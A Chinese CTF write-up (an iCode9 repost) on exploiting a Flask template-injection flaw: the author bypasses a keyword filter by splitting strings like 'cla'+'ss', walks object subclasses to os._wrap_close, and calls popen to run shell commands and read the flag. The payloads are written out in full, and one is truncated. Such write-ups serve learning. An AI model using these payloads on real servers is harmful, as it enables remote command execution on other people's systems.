标签：__ .__ 真香 flask cla ss bases session 四叶草

简单的ssti，但是ssti输出点很迷，导致花了十来分钟才找到。
进入题目看到一个3D矢量模型，但是并没有找到信息传入和输出的地方：

然后思路卡在了这里，尝试了arjun和dirsearch均无果，然后发现题目的404页面是自己编写的：

尝试了一下{{2*2}}便找到了ssti点：

然后简单fuzz了一下，发现过滤的很多，存在违禁词时会返回500状态，过滤了：

class
subclasses
config
args
request
open
eval
import

我们可以找到session对象，并且利用其dict的类型来通过字典的键名（键名为字符串，可拼接）来寻找我们需要的类。
通过字符串拼接来绕过过滤，构造：{{session['cla'+'ss']}}

然后不断拼接__bases__[0]来一层一层向上查找基类，直到找到object基类：{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]}}

再利用__subclasses__去访问object基类下的所有子类：{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[:}}

我们尝试寻找可以执行命令的子类，主要应该考虑os类，在页面中搜索后找到os._wrap_close类，定位其位置并使用__init__来将其实例化，再使用__globals__来查看所有变量：
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[237].__init__.__globals__}}

并且我们也在该类下找到了可以用于执行命令的popen函数：

但是popen也会被过滤，还是使用字符串拼接的方法绕过：
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[237].__init__.__globals__['po'+'pen']('ls').read()}}
成功RCE：

然后再执行cat Th1s__is_S3cret即可获得Flag

做完之后发现这道题是NCTF2018的一道原题，于是百度找到了一位大师傅的Wp：深入SSTI-从NCTF2018两道Flask看bypass新姿势
文章将ssti bypass的思路与原理分析的非常清晰，学到了很多操作，推荐一下

标签：__,.__,真香,flask,cla,ss,bases,session,四叶草
来源： https://www.cnblogs.com/yesec/p/15033268.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。